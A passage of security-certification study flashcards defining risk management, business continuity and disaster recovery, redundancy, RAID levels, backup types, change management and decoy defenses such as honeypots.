The total cost of a risk to an organization on an annual basis. This is determined by multiplying the SLE by the annual rate of occurrence (ARO).

the amount that would be lost over the course of a year. This is determined by multiplying the SLE by the Annualized Rate of Occurrence (ARO).

Annualized Rate of Occurrence (ARO).-In risk calculation, an expression of the probability/likelihood of a risk as the number of times per year a particular loss is expected to occur.

 

 

 

Term

QUALITATIVE RISK ASSESSMENT

Definition
Qualitative risk assessment avoids the complexity of the quantitative approach and is focused on identifying significant risk factors. The qualitative approach seeks out people's opinions of which risk factors are significant. Assets and risks may be placed in simple categories.
Term
 Inherent risk
Definition

Risk that an event will pose if no controls are put in place to mitigate it.

The result of a quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before any type of mitigation has been attempted.

Term
Risk mitigation (or remediation) 
Definition

The response of reducing risk to fit within an organization's risk appetite.

Risk mitigation (or remediation) is the overall process of reducing exposure to or the effects of risk factors. 

Term
risk deterrence (or reduction).  
Definition

In risk mitigation, the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario.

 

Term
Avoidance
Definition

In risk mitigation, the practice of ceasing activity that presents risk.Avoidance means that you stop doing the activity that is risk-bearing.

 

Term
Transference (or sharing)
Definition

In risk mitigation, the response of moving or sharing the responsibility of risk to another entity, such as by purchasing cybersecurity insurance.

Transference (or sharing) means assigning risk to a third party, such as an insurance company or a contract with a supplier that defines liabilities.

 

Term

Risk Acceptance

Definition

The response of determining that a risk is within the organization's appetite and no countermeasures other than ongoing monitoring is needed.

 

Risk acceptance (or tolerance) means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be unavoidable delay before the countermeasures are deployed. In this case, you should continue to monitor the risk (as opposed to ignoring it). 

Term
Residual Risk 
Definition

Risk that remains even after controls are put into place.

Where inherent risk is the risk before mitigation, residual risk is the likelihood and impact after specific mitigation, transference, or acceptance measures have been applied.

 

Term

Risk Appetite 

Definition

Risk appetite is a strategic assessment of what level of residual risk is tolerable. Risk appetite is broad in scope. Where risk acceptance has the scope of a single system, risk appetite has a project- or institution-wide scope. Risk appetite is constrained by regulation and compliance.

Term

Risk Appetite 

Definition

Risk appetite is a strategic assessment of what level of residual risk is tolerable. Risk appetite is broad in scope. Where risk acceptance has the scope of a single system, risk appetite has a project- or institution-wide scope. Risk appetite is constrained by regulation and compliance.

Term
Control risk 
Definition

Risk that arises when a control does not provide the level of mitigation that was expected.

 

Control risk is a measure of how much less effective a security control has become over time. For example, antivirus became quite capable of detecting malware on the basis of signatures, but then less effective as threat actors started to obfuscate code. Control risk can also refer to a security control that was never effective in mitigating inherent risk. This illustrates the point that risk management is an ongoing process, requiring continual reassessment and re-prioritization.

Term
 risk register
Definition

A document highlighting the results of risk assessments in an easily comprehensible format (such as a "traffic light" grid). Its purpose is for department managers and technicians to understand risks associated with the workflows that they manage.

risk register is a document showing the results of risk assessments in a comprehensible format. The register may resemble the heat map risk matrix shown earlier with columns for impact and likelihood ratings, date of identification, description, countermeasures, owner/route for escalation, and status. Risk registers are also commonly depicted as scatterplot graphs, where impact and likelihood are each an axis, and the plot point is associated with a legend that includes more information about the nature of the plotted risk. A risk register should be shared between stakeholders (executives, department managers, and senior technicians) so that they understand the risks associated with the workflows that they manage.

 

 

Term
heat map risk matrix
 [image]
Definition

A graphical table indicating the likelihood and impact of risk factors identified for a workflow, project, or department for reference by stakeholders.

 

Term
Business impact analysis (BIA) 
Definition

A systematic activity that identifies organizational risks and determines their effect on ongoing, mission critical operations.

Business impact analysis (BIA) is the process of assessing what losses might occur for a range of threat scenarios.

 

Term
mission essential function (MEF) 
Definition

A business or organizational activity that is too critical to be deferred for anything more than a few hours, if at all.

 

mission essential function (MEF) is one that cannot be deferred. This means that the organization must be able to perform the function as close to continually as possible, and if there is any service disruption, the mission essential functions must be restored first.

Term
Maximum tolerable downtime (MTD)
Definition

The longest period of time a business can be inoperable without causing irrevocable business failure.

Maximum tolerable downtime (MTD) is the longest period of time that a business function outage may occur for without causing irrecoverable business failure. Each business process can have its own MTD, such as a range of minutes to hours for critical functions, 24 hours for urgent functions, seven days for normal functions, and so on. MTDs vary by company and event. Each function may be supported by multiple systems and assets. The MTD sets the upper limit on the amount of recovery time that system and asset owners have to resume operations.

 

Term
Recovery time objective (RTO)
Definition

The length of time it takes after an event to resume normal business operations and activities.

 

  • Recovery time objective (RTO) is the period following a disaster that an individual IT system may remain offline. This represents the amount of time it takes to identify that there is a problem and then perform recovery (restore from backup or switch in an alternative system, for instance).
Term
Work Recovery Time (WRT)
Definition

Following systems recovery, there may be additional work to reintegrate different systems, test overall functionality, and brief system users on any changes or different working practices so that the business function is again fully supported. 

RTO+WRT must not exceed MTD!

Term
Recovery Point Objective (RPO)
Definition

The longest period of time that an organization can tolerate lost data being unrecoverable.

 

  • Recovery Point Objective (RPO) is the amount of data loss that a system can sustain, measured in time. That is, if a database is destroyed by a virus, an RPO of 24 hours means that the data can be recovered (from a backup copy) to a point not more than 24 hours before the database was infected.
Term
[image]
Definition
Term
business continuity planning (BCP)  
Definition

 

Where BIA identifies risks, business continuity planning (BCP) identifies controls and processes that enable an organization to maintain critical workflows in the face of some adverse event.

Term
IDENTIFICATION OF CRITICAL SYSTEMS
Definition

To support the resiliency of mission essential and primary business functions, it is crucial to perform an identification of critical systems. This means compiling an inventory of business processes and the assets that support them. Asset types include:

§  People (employees, visitors, and suppliers).

§  Tangible assets (buildings, furniture, equipment and machinery (plant), ICT equipment, electronic data files, and paper documents).

§  Intangible assets (ideas, commercial reputation, brand, and so on).

 

§  Procedures (supply chains, critical procedures, standard operating procedures).

Term
business process analysis (BPA) 
Definition

For mission essential functions, it is important to reduce the number of dependencies between components. Dependencies are identified by performing a business process analysis (BPA) for each function. The BPA should identify the following factors:

§  Inputs—the sources of information for performing the function (including the impact if these are delayed or out of sequence).

§  Hardware—the particular server or data center that performs the processing.

§  Staff and other resources supporting the function.

§  Outputs—the data or resources produced by the function.

 

§  Process flow—a step-by-step description of how the function is performed.

Term
single points of failure (SPoF)
Definition

A component or system that would cause a complete interruption of a service if it failed. 


 A SPoF is an asset that causes the entire workflow to fail if it is damaged or otherwise not available. SPoFs can be mitigated by provisioning redundant components. Metrics for asset reliability can help to determine when and how much redundancy is required.

Term
Mean Time Between Failures (MTBF) 
Definition

Metric for a device or component that predicts the expected time between failures.



  • Mean Time Between Failures (MTBF) represents the expected lifetime of a product. The calculation for MTBF is the total operational time divided by the number of failures. For example, if you have 10 appliances that run for 50 hours and two of them fail, the MTBF is 250 hours/failure (10*50)/2.
Term
Mean Time to Failure (MTTF)
Definition

Metric indicating average time a device or component is expected to be in operation.

expresses a similar metric for non-repairable components. For example, a hard drive may be described with an MTTF, while a server, which could be repaired by replacing the hard drive, would be described with an MTBF. The calculation for MTTF is the total operational time divided by the number of devices. For example, say two drives were installed in the server in a RAID array. One had failed after 10 years, but had never been replaced, and the second failed after 14 years, bringing down the array and the server. The MTTF of the drives is (10+14)/2 = 12 years.

Term
Mean Time to Repair (MTTR)
Definition

Metric representing average time taken for a device or component to be repaired, replaced, or otherwise recover from a failure.

 is a measure of the time taken to correct a fault so that the system is restored to full operation. This can also be described as mean time to replace or recover. MTTR is calculated as the total number of hours of unplanned maintenance divided by the number of failure incidents. This average value can be used to estimate whether a recovery time objective (RTO) is achievable.

 

Term
DISASTERS 
Definition

In terms of business continuity, a disaster is an event that could threaten mission essential functions. For example, a privacy breach is a critical incident, but it is probably not a direct threat to business functions. An earthquake that destroys a data center is a disaster-level event. Disaster response involves many of the same principles and procedures as incident response, but at a larger scale.

Term

Internal Disaster 

Definition

An internal disaster is one that is caused by malicious activity or by accident by an employee or contractor—anyone or anything whose presence within the company or organization has been authorized. Internal disaster also encompasses system faults, such as wiring causing a fire.

Term

External Disaster 

Definition
Conversely, external disaster events are caused by threat actors who have no privileged access. External disaster includes disasters that have an impact on the organization through wider environmental or social impacts, such as disruption of public services or impacts to the supply chain.
Term

 

Person-Made 

Definition

A person-made disaster event is one where human agency is the primary cause. Typical examples other than devastating cybersecurity incidents include terrorism, war, vandalism, pollution, and arson. There can also be accidental person-made disasters, such as cutting through power or telecoms cabling.

 

Term
Environmental 
Definition

An environmental disaster, or natural disaster, is one that could not be prevented through human agency. Environmental disasters include river or sea floods, earthquakes, storms, disease, and so on. Natural disasters may be quite predictable (as is the case with areas prone to flooding or storm damage) or unexpected, and therefore difficult to plan for.

 

Term

 

Site Risk Assessment

Definition

Where cybersecurity generally has financial impacts, site safety can have impacts to life and property. A site risk assessment evaluates exposure to the following types of factor:

 

Risk from disaster events, such as earthquake, flood, and fire. These events can occur naturally or from person-made causes.

Risk from disruption to utilities, such as electricity, water, and transportation. These risks are higher in geographically isolated sites.

Risk to health and safety from on-premises electromechanical systems or chemicals.

Term
Disaster recovery plans (DRPs)
Definition

A documented and resourced plan showing actions and responsibilities to be used in response to critical incidents. 

Disaster recovery plans (DRPs) describe the specific procedures to follow to recover a system or site to a working state following a disaster-level event. 

 

Term
Disaster recovery plans (DRPs) 
The DRP should accomplish the following:
Definition

1.    Identify scenarios for natural and non-natural disaster and options for protecting systems. Plans need to account for risk (a combination of the likelihood the disaster will occur and the possible impact on the organization) and cost.

There is no point implementing disaster recovery plans that financially damage the organization. The business case is made by comparing the cost of recovery measures against the cost of downtime. The recovery plan should not generally exceed the downtime cost.

2.    Identify tasks, resources, and responsibilities for responding to a disaster.

·         Who is responsible for doing what? How can they be contacted? What happens if they are not available?

·         Which functions are most critical? Where should effort first be concentrated?

·         What resources are available? Should they be pre-purchased and held in stock? Will the disaster affect availability of supplies?

·         What are the timescales for resumption of normal operations?

3.            Train staff in the disaster planning procedures and how to react well to change.

 

As well as restoring systems, the disaster recovery plan should identify stakeholders who need to be informed about incidents with impacts to life and safety. There may be a legal requirement to inform the police, fire service, or building inspectors about any safety-related or criminal incidents. If third-party or personal data is lost or stolen, the data subjects may need to be informed. If the disaster affects services, customers need to be informed about the time-to-fix and any alternative arrangements that can be made.

Term
FUNCTIONAL RECOVERY PLANS
Definition

Because disasters are extreme and (hopefully) rare events, it is very difficult to evaluate how effective or functional a recovery plan is. There are four principal methods for assessing the functionality of recovery plans:

  • Walk-throughs, workshops, and orientation seminars—often used to provide basic awareness and training for disaster recovery team members, these exercises describe the contents of DRPs, and other plans, and the roles and responsibilities outlined in those plans.
  • Tabletop exercises—staff "ghost" the same procedures as they would in a disaster, without actually creating disaster conditions or applying or changing anything. These are simple to set up but do not provide any sort of practical evidence of things that could go wrong, time to complete, and so on.
  • Functional exercises—action-based sessions where employees can validate DRPs by performing scenario-based activities in a simulated environment.
  • Full-scale exercises— action-based sessions that reflect real situations, these exercises are held onsite and use real equipment and real personnel as much as possible. Full-scale exercises are often conducted by public agencies, but local organizations might be asked to participate.
Term
 high availability
Definition

The property that defines how closely systems approach the goal of providing data availability 100 percent of the time while maintaining a high level of system performance.


One of the key properties of a resilient system is high availability. Availability is the percentage of time that the system is online, measured over the defined period, typically one year.

Term
Scalability
Definition

Scalability is the capacity to increase resources to meet demand within similar cost ratios. This means that if service demand doubles, costs do not more than double. There are two types of scalability:

§  To scale out is to add more resources in parallel with existing resources.

 

§  To scale up is to increase the power of existing resources.

Term
Elasticity
Definition

Elasticity refers to the system's ability to handle these changes on demand in real time. A system with high elasticity will not experience loss of service or performance if demand suddenly increases rapidly.

Term
fault tolerant.
Definition

Protection against system failure by providing extra (redundant) capacity. Generally, fault tolerant systems identify and eliminate single points of failure.


A system that can experience failures and continue to provide the same (or nearly the same) level of service is said to be fault tolerant.

Term
redundancy 
Definition

Overprovisioning resources at the component, host, and/or site level so that there is failover to a working instance in the event of a problem.

 

Fault tolerance is often achieved by provisioning redundancy for critical components and single points of failure. A redundant component is one that is not essential to the normal function of a system but that allows the system to recover from the failure of another component.

Term
brownouts
Definition

A brownout occurs when the power that is supplied by the electrical wall socket is insufficient to allow the computer to function correctly. Brownouts are long sags in power output that are often caused by overloaded or faulty grid distribution circuits or by a failure in the supply route from electrical power station to a building.

 

Term
Power management
Definition

Power management means deploying systems to ensure that equipment is protected against these events and that network operations can either continue uninterrupted or be recovered quickly. 

Term

Dual Power Supplies 

Definition

An enterprise-class server or appliance enclosure is likely to feature two or more power supply units (PSUs) for redundancy. A hot plug PSU can be replaced (in the event of failure) without powering down the system. 

Term
power distribution unit (PDU) 
Definition

Advanced strip socket that provides filtered output voltage. A managed unit supports remote administration.Managed PDUs support remote power monitoring functions, such as reporting load and status, switching power to a socket on and off, or switching sockets on in a particular sequence. 

 

Term
Uninterruptible Power Supplies (UPSs) 
Definition

At the system level, an uninterruptible power supply (UPS) will provide a temporary power source in the event of a blackout (complete power loss). This may range from a few minutes for a desktop-rated model to hours for an enterprise system. In its simplest form, a UPS comprises a bank of batteries and their charging circuit plus an inverter to generate AC voltage from the DC voltage supplied by the batteries.

The time allowed by a UPS should be sufficient to failover to an alternative power source, such as a standby generator. If there is no secondary power source, UPS will at least allow the administrator to shut down the server or appliance properly—users can save files, and the OS can complete the proper shut down routines.

Term
Battery backup 
Definition

If there is loss of power, system operation can be sustained for a few minutes or hours (depending on load) using battery backup. Battery backup can be provisioned at the component level for disk drives and RAID arrays. The battery protects any read or write operations cached at the time of power loss

Term
backup power generator 
Definition

A Standby Power Supply fueled by diesel or propane. In the event of a power outage, a UPS must provide transitionary power, as a backup generator cannot be cut-in fast enough.

backup power generator can provide power to the whole building, often for several days. Most generators use diesel, propane, or natural gas as a fuel source. With diesel and propane, the main drawback is safe storage (diesel also has a shelf-life of between 18 months and two years); with natural gas, the issue is the reliability of the gas supply in the event of a natural disaster. 

 

Term

Network Interface Card (NIC) Teaming 

Definition

Network interface card (NIC) teaming, or adapter teaming, means that the server is installed with multiple NICs, or NICs with multiple ports, or both. Each port is connected to separate network cabling. During normal operation, this can provide a high-bandwidth link. For example, four 1 Gb ports should give an overall bandwidth of 4 Gb. If there is a problem with one cable, or one NIC, the network connection will continue to work, though at just 3 Gb.

Term

Load Balancers

Definition

NIC teaming provides load balancing at the adapter level. Load balancing and clustering can also be provisioned at a service level:

§  A load balancing switch distributes workloads between available servers.

 

§  A load balancing cluster enables multiple redundant servers to share data and session information to maintain a consistent service if there is failover from one server to another.

Term
Redundant Array of Independent Disks (RAID)
Definition

When a storage system is configured as a Redundant Array of Independent Disks (RAID), many disks can act as backups for each other to increase reliability and fault tolerance. If one disk fails, the data is not lost, and the server can keep functioning

Term
RAID 0
Definition

RAID Level

Minimum Disks

Storage Efficiency

Maximum Disk Failures

Fault Tolerance

Level 0

N/A

100%

0

Striping improves performance by spreading operations across all devices in the set. RAID 0 has no redundancy, meaning that the failure of a single disk will cause the volume to fail.

Term
RAID 1
Definition
Term
RAID 1
Definition

RAID Level

Minimum Disks

Storage Efficiency

Maximum Disk Failures

Fault Tolerance

   

Level 1

2

50%

1

Mirroring means that data is written to two disks simultaneously, providing redundancy (if one disk fails, there is a copy of data on the other). The main drawback is that storage efficiency is only 50%.

Term
RAID 5
Definition

RAID Level

Minimum Disks

Storage Efficiency

Maximum Disk Failures

Fault Tolerance

Level 5

3

67% with 3 drives, 75% with 4 drives, and so on

1

Striping with parity means that data is written across three or more disks along with parity information. The parity information allows the volume to continue if one disk is lost, though at a substantial penalty to performance. This solution has better storage efficiency than RAID 1, but worse write performance.

Term
RAID 6
Definition

RAID Level

Minimum Disks

Storage Efficiency

Maximum Disk Failures

Fault Tolerance

Level 6

4

50% with 4 drives, 60% with 5 drives, 67% with 6 drives, and so on

2

Double parity, or level 5 with an additional parity stripe, allows the volume to continue when two devices have been lost.

Term
RAID 10
Definition

RAID Level

Minimum Disks

Storage Efficiency

Maximum Disk Failures

Fault Tolerance

Level 10 (RAID 1+0)

4

50%

1+

RAID 10 configures a striped set of mirrored subgroups. This combines the performance improvement of striping with the security of mirroring. The volume can sustain the failure of a single device within each subgroup. If both devices in the same subgroup were to fail, the volume would be lost.

Term
RAID 50 (5+0)
Definition

RAID Level

Minimum Disks

Storage Efficiency

Maximum Disk Failures

Fault Tolerance

Level 50 (RAID 5+0)

6

67% with 3 drives per subgroup, 75% with 4 drives per subgroup, and so on

1+

RAID 50 configures a striped set of parity subgroups. For example, a 6 disk array could be configured as two 3-disk RAID 5 subgroups. As with RAID 10, this improves performance. Each subgroup can sustain the loss of a single device.

Term
multipath 
Definition

Overprovisioning controllers and cabling so that a host has failover connections to storage media.

Where RAID provides redundancy for the storage devices, multipath is focused on the bus between the server and the storage devices or RAID array. A storage system is accessed via some type of controller. The controller might be connected to disk units locally installed in a server, or it might connect to storage devices within a storage area network (SAN). Multipath input/output (I/O) ensures that there is controller redundancy and/or multiple network paths to the storage devices.

 

Term
REPLICATION
Storage Area Network (SAN)
Definition
most enterprise storage is configured as a SAN. A SAN is a high-speed fiber optic network of storage devices built from technologies such as Fibre Channel, Small Computer System Interface (SCSI), or Infiniband. Redundancy can be provided within the SAN, and replication can also take place between SANs using WAN links.
Term
REPLICATION 
Virtual Machine (VM)
Definition

the same VM instance may need to be deployed in multiple locations. This can be achieved by replicating the VM's disk image and configuration settings. 

Term
Geographical dispersal
Definition

Resiliency mechanism where processing and data storage resources are replicated between physically distant sites.

Geographical dispersal refers to data replicating hot and warm sites that are physically distant from one another. This means that data is protected against a natural disaster wiping out storage at one of the sites. This is also described as a geo-redundant solution.

 

Term

 

On-Premises versus Cloud

Definition

High availability through redundancy and replication is resource-intensive, especially when configuring multiple hot or warm sites. For on-premises sites, provisioning the storage devices and high-bandwidth, low-latency WAN links required between two geographically dispersed hot sites could incur unaffordable costs. This cost is one of the big drivers of cloud services, where local and geographic redundancy are built into the system, if you trust the CSP to operate the cloud effectively. For example, in the cloud, geo-redundancy replicates data or services between data centers physically located in two different regions. Disasters that occur at the regional level, like earthquakes, hurricanes, or floods, should not impact availability across multiple zones. 

 

Term
backups
Definition

Recovery of data can be provided through the use of a backup system. Most backup systems provide support for tape devices. This provides a reasonably reliable and quick mechanism for copying critical data. Different backup types (full, incremental, or differential) balance media capacity, time required to backup, and time required to restore. 

 

Term
full backup  
Definition

A backup type in which all selected files, regardless of prior state, are backed up.

 

Type

Data Selection

Backup/Restore Time

Archive Attribute

Full

All selected data regardless of when it was previously backed up

High/low (one tape set)

Cleared

Term

Incremental

[image]

Definition

 

A backup type in which all selected files that have changed since the last full or incremental backup (whichever was most recent) are backed up.

 

Type

Data Selection

Backup/Restore Time

Archive Attribute

   

Incremental

New files, as well as files modified since the last backup

Low/high (multiple tape sets)

Cleared

 

An incremental backup selects all new and modified files since the last full or incremental backup. This minimizes the media capacity requirement and reduces the time taken to complete each backup job.

 

Restoring from incremental sets is more complex, as the full media set and every incremental set is required.

There is also more risk, as if one of the sets is corrupted or damaged, the following sets will generally not be usable either. This risk does not arise with differential backups.

Term
differential backup[image]
Definition

A backup type in which all selected files that have changed since the last full backup are backed up.

       

Differential

All new and modified files since the last full backup

Moderate/moderate (no more than two sets)

Not Cleared

 

Term

Copy Backups 

Definition
Most software also has the capability to do copy backups. These are made outside the media rotation system and do not affect the archive attribute.
Term

Snapshots

Definition

A snapshot is a point-in-time copy of data maintained by the file system. A backup program can use the snapshot rather than the live data to perform the backup. In Windows, snapshots are provided for on NTFS volumes by the Volume Shadow Copy Service (VSS). They are also supported on Sun's ZFS file system, and under some distributions of Linux.

Term
Images 
Definition

An image backup is made by duplicating an OS installation. This can be done either from a physical hard disk or from a VM's virtual hard disk. Imaging allows the system to be redeployed quickly, without having to reinstall third-party software, patches, and configuration settings. A system image should generally not contain any user data files, as these will quickly become out of date.

Term

Offsite Storage 

Definition

Additionally, you must plan for events that could compromise both the live data and the backup set. Natural disasters, such as fires, earthquakes, and floods, could leave an organization without a data backup, unless they have kept a copy offsite. Distance consideration is a calculation of how far offsite the backup needs to be kept, given different disaster scenarios. On the one hand, the media must be kept far away enough not to be damaged by the disaster; on the other, media access should not slow down a recovery operation too much. 

Term

Online versus Offline Backups 

Definition

As well as the onsite/offsite consideration, you should also be aware of a distinction between online and offline backups. An online backup system is instantly available to perform a backup or restore operation without an administrator having to transport and connect a device or load some backup media. An offline backup is disconnected from the host and must be connected manually.

An online system is faster, but an offline backup offers better security. Consider the case of cryptoransomware, for instance. If the backup system is connected to the infected host, the ransomware will encrypt the backup, rendering it useless. Some cryptoransomware is configured to try to access cloud accounts and encrypt the cloud storage 

Term

BACKUP MEDIA TYPES

Disk

Definition

Individual removable hard drives are an excellent low-cost option for small office/home office (SOHO) network backups, but they do not have sufficient capacity or flexibility to be used within an automated enterprise backup solution.

Term

 

BACKUP MEDIA TYPES

Network Attached Storage (NAS)

Definition

A storage device with an embedded OS that supports typical network file access protocols (TCP/IP and SMB for instance).

network attached storage (NAS) appliance is a specially configured type of server that makes RAID storage available over common network protocols, such as Windows File Sharing (SMB) or FTP. A NAS appliance is accessed via an IP address and backup takes place at file-level. A NAS can be another good option for SOHO backup, but as a single device, it provides no offsite option. As it is normally kept online, it can be vulnerable to cryptoransomware as well.

 

Term
Digital tape
Definition

Tape media provides robust, high-capacity backup storage. Tape drives and autoloader libraries can be connected to the SATA and SAS buses or accessed via a SAN.

 


Digital 
tape systems are a popular choice for institutions with multi-terabyte storage requirements. Tape is very cost effective and, given a media rotation system, tapes can be transported offsite. The latest generation of tape will store about 10-12 terabytes per cartridge or up to about 30 TB with compression. The main drawback of tape is that it is slow, compared to disk-based solutions, especially for restore operations.

Term

Storage Area Network (SAN) and Cloud

Definition

A network dedicated to data storage, typically consisting of storage devices and servers connected to switches via host bus adapters.

 

A RAID array or tape drive/autoloader can be provisioned as direct attached storage, where a server hosts the backup devices, usually over serial attached SCSI (SAS). Direct attached storage has limited scalability, so enterprise and cloud storage solutions often use storage area networks (SAN) as a layer of abstraction between the file system objects presented to servers and the configuration of the actual storage media. Where NAS uses file-level access to storage, a SAN is based on block-level addressing. A SAN can incorporate RAID arrays and tape systems within the same network. SANs can achieve offsite storage through replication.

 

 

Term

RESTORATION ORDER

Definition

A concept that dictates the sequence in which systems must be brought back online during disaster recovery.

In very general terms, the order of restoration will be as follows:

1.    Enable and test power delivery systems (grid power, power distribution units [PDUs], UPS, secondary generators, and so on).

2.    Enable and test switch infrastructure, then routing appliances and systems.

3.    Enable and test network security appliances (firewalls, IDS, proxies).

4.    Enable and test critical network servers (DHCP, DNS, NTP, and directory services).

5.    Enable and test back-end and middleware (databases and business logic). Verify data integrity. 

6.    Enable and test front-end applications.

 

7.    Enable client workstations and devices and client browser access.

 

Term
Nonpersistence
Definition

The property by which a computing environment is discarded once it has finished its assigned task.

Nonpersistence describes a computing environment (e.g., virtual machine instance) that is static in terms of processing function. Storing data elsewhere allows the instance to be destroyed and rebuilt with the same functionality without suffering configuration problems

 

Term
Snapshot/revert to known state— 
Definition

§  this is a saved system state that can be reapplied to the instance.

Term
Rollback to known configuration 
Definition

§  a physical instance might not support snapshots but has an "internal" mechanism for restoring the baseline system configuration, such as Windows System Restore.

Term
Live boot media 
Definition
another option is to use an instance that boots from read-only storage to memory rather than being installed on a local read/write hard disk.
Term
Configuration management 
Definition

The process through which an organization's information systems components are kept in a controlled state that meets the organization's requirements, including those for security and compliance.

 

Configuration management ensures that each component of ICT infrastructure is in a trusted state that has not diverged from its documented properties.

 

Term
Change control  
Definition

The process by which the need for change is recorded and approved.

 

Term
 change management 
Definition

The process through which changes to the configuration of information systems are implemented, as part of the organization's overall configuration management efforts.

 

 

Term
Service assets 
Definition
are things, processes, or people that contribute to the delivery of an IT service.
Term
Configuration Item (CI)
Definition
 is an asset that requires specific management procedures for it to be used to deliver the service. Each CI must be identified by some sort of label, ideally using a standard naming convention. CIs are defined by their attributes and relationships, which are stored in a configuration management database (CMDB).
Term
 baseline configuration 
Definition

A collection of security and configuration settings that are to be applied to a particular system or network in the organization.

the template of settings that a device, VM instance, or other CI was configured to, and that it should continue to match. You might also record performance baselines, such as the throughput achieved by a server, for comparison with monitored levels.

 

Term
configuration management system (CMS) 
Definition

the tools and databases that collect, store, manage, update, and present information about CIs and their relationships. A small network might capture this information in spreadsheets and diagrams; there are dedicated applications for enterprise CMS. 

Term
Diagrams 
Definition
  • Diagrams are the best way to capture the complex relationships between network elements. Diagrams can be used to show how CIs are involved in business workflows, logical (IP) and physical network topologies, and network rack layouts. Remember, it is not sufficient simply to create the diagram, you must also keep the diagram up to date.
Term
standard naming convention 
Definition

Applying consistent names and labels to assets and digital resources/identities within a configuration management system.

standard naming convention for hardware assets, and for digital assets such as accounts and virtual machines, makes the environment more consistent. This means that errors are easier to spot and that it is easier to automate through scripting. The naming strategy should allow administrators to identify the type and function of any particular resource or location at any point in the CMDB or network directory. 

 

Term
IP address management (IPAM) 
Definition

Software consolidating management of multiple DHCP and DNS services to provide oversight into IP address allocation across an enterprise network.

 

Term

Internet Protocol (IP) Schema

Definition
The division of the IP address space into subnets should be carefully planned and documented in an Internet Protocol (IP) schema. Using a consistent addressing methodology makes it easier to apply firewall access control lists (ACLs) and perform security monitoring  It also makes configuration errors less likely and easier to detect. Within each subnet, the schema should identify IP addresses reserved for manual or static allocation versus DHCP address pools. IP address management (IPAM) software suites can be used to monitor IP usage.
Term

Change Control

Definition

A change control process can be used to request and approve changes in a planned and controlled way. Change requests are usually generated when something needs to be corrected, when something changes, or when there is room for improvement in a process or system currently in place. The need to change is often described either as reactive, where the change is forced on the organization, or as proactive, where the need for change is initiated internally. Changes can also be categorized according to their potential impact and level of risk (major, significant, minor, or normal, for instance). In a formal change management process, the need or reasons for change and the procedure for implementing the change is captured in a request for change (RFC) document and submitted for approval.

The RFC will then be considered at the appropriate level and affected stakeholders will be notified. This might be a supervisor or department manager if the change is normal or minor. Major or significant changes might be managed as a separate project and require approval through a change advisory board (CAB). 

Term
Change Management
Definition

The implementation of changes should be carefully planned, with consideration for how the change will affect dependent components. For most significant or major changes, organizations should attempt to trial the change first. Every change should be accompanied by a rollback (or remediation) plan, so that the change can be reversed if it has harmful or unforeseen consequences. Changes should also be scheduled sensitively if they are likely to cause system downtime or other negative impact on the workflow of the business units that depend on the IT system being modified. Most networks have a scheduled maintenance window period for authorized downtime. When the change has been implemented, its impact should be assessed, and the process reviewed and documented to identify any outcomes that could help future change management projects.

 

 

Term
hot site 
Definition

A fully configured alternate network that can be online quickly after a disaster.

  • hot site can failover almost immediately. It generally means that the site is already within the organization's ownership and is ready to deploy. For example, a hot site could consist of a building with operational computer equipment that is kept updated with a live data set.

 

Term
warm site  
Definition

A location that is dormant or performs noncritical functions under normal conditions, but which can be rapidly converted to a key operations site if needed.

warm site could be similar, but with the requirement that the latest data set will need to be loaded.

 

Term
 cold site 
Definition

A predetermined alternate location where a network can be rebuilt after a disaster.

cold site takes longer to set up. A cold site may be an empty building with a lease agreement in place to install whatever equipment is required when necessary.

 

Term
Layered security 
Definition

An approach that incorporates many different avenues of defense when securing systems and their data against attack. Also known as defense in depth.

Layered security is typically seen as improving cybersecurity resiliency because it provides defense in depth. The idea is that to fully compromise a system, the attacker must get past multiple security controls, providing control diversity. These layers reduce the potential attack surface and make it much more likely that an attack will be deterred or prevented, or at least detected and then prevented by manual intervention. 

 

 

 

Term
 defense in depth 
Definition

A security strategy that positions the layers of network security as network traffic roadblocks; each layer is intended to slow an attack's progress, rather than eliminating it outright.

Layered security is typically seen as improving cybersecurity resiliency because it provides defense in depth. The idea is that to fully compromise a system, the attacker must get past multiple security controls, providing control diversity. These layers reduce the potential attack surface and make it much more likely that an attack will be deterred or prevented, or at least detected and then prevented by manual intervention. 

 

 

Term
diversity 
Definition

Cybersecurity resilience strategy that increases attack costs by provisioning multiple types of controls, technologies, vendors, and crypto implementations.

 

Term
Technology diversity
Definition

Technology diversity refers to environments that are a mix of operating systems, applications, coding languages, virtualization solutions, and so on.

Term
Control diversity
Definition
 Control diversity means that the layers of controls should combine different classes of technical and administrative controls with the range of control functions: prevent, detect, correct, and deter.
Term

Vendor Diversity 

Definition

As well as deploying multiple types of controls, you should consider the advantages of leveraging vendor diversity. Vendor diversity means that security controls are sourced from multiple suppliers. A single vendor solution is a tempting choice for many organizations, as it provides interoperability and can reduce training and support costs. Some disadvantages could include the following:

§  Not obtaining best-in-class performance—one vendor might provide an effective firewall solution, but the bundled malware scanning is found to be less effective.

§  Less complex attack surface—a single vulnerability in a supplier's code could put multiple appliances at risk in a single vendor solution. A threat actor will be able to identify controls and possible weaknesses more easily.

 

§  Less innovation—dependence on a single vendor might make the organization invest too much trust in that vendor's solutions and less willing to research and test new approaches. 

Term

Cryptography Diversity

Definition

This concept can be extended to the selection of algorithms and implementations of cryptography. Adoption of methods such as blockchain-based Identity and Access Management (IAM)  or selecting ChaCha in place of Advanced Encryption Standard (AES) as a preferred cipher suite  forces threat actors to develop new attack methods.

Term
Active defense 
Definition

The practice of responding to a threat by destroying or deceiving a threat actor's capabilities.

 

Active defense means an engagement with the adversary, but this can be interpreted in several different ways. One type of active defense involves the deployment of decoy assets to act as lures or bait. It is much easier to detect intrusions when an attacker interacts with a decoy resource, because you can precisely control baseline traffic and normal behavior in a way that is more difficult to do for production assets.

 

Term
honeypot 
Definition

A host, network, or file set up with the purpose of luring attackers away from assets of actual value and/or discovering attack strategies and weaknesses in the security configuration.

 

honeypot is a computer system set up to attract threat actors, with the intention of analyzing attack strategies and tools, to provide early warnings of attack attempts, or possibly as a decoy to divert attention from actual computer systems. Another use is to detect internal fraud, snooping, and malpractice

 

Term
honeynet 
Definition

A honeynet is an entire decoy network. This may be set up as an actual network or simulated using an emulator.

Deploying a honeypot or honeynet can help an organization to improve its security systems, but there is the risk that the attacker can still learn a great deal about how the network is configured and protected from analyzing the honeypot system. 

Term
honeyfile 
Definition

A honeypot or honeynet can be combined with the concept of a honeyfile, which is convincingly useful, but actually fake, data. This honeyfile can be made trackable, so that when a threat actor successfully exfiltrates it, the attempts to reuse or exploit it can be traced.

Term

